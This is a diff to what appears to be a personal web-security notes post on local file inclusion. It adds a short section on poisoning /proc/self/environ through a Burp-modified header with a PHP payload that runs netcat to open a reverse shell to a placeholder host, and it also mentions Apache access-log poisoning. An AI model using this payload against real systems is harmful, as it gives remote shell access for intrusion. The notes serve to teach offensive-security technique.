--- a/_posts/notes/web/2022-04-23-lfi.md
+++ b/_posts/notes/web/2022-04-23-lfi.md
@@ -40,6 +40,13 @@ Help to escape LFI sanitazer. For example:
 ## Log Poisoning
 Change logs in order to recreate a RCE.
 
+#### Reverse Shell
+We can execute code accesing **/proc/self/environ**. We can modify the header in burpsuite to add:
+{% highlight plain %}
+<?passthru('nc -e /bin/bash <ip>:<port>');?>
+{% endhighlight %}
+To execute the reverse shell.
+
 #### Apache2
 In **/var/log/apache2/access.log** we can manipulate the user agent that the log is currently saving in the logs with curl. For example:
 {% highlight plain %}
